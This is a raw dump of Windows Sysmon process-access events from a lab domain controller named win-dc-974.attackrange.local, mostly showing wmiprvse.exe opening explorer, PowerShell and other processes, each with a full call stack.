16:54:03.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.029{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6DAB-603E-B4AA-00000000AD01}12712C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 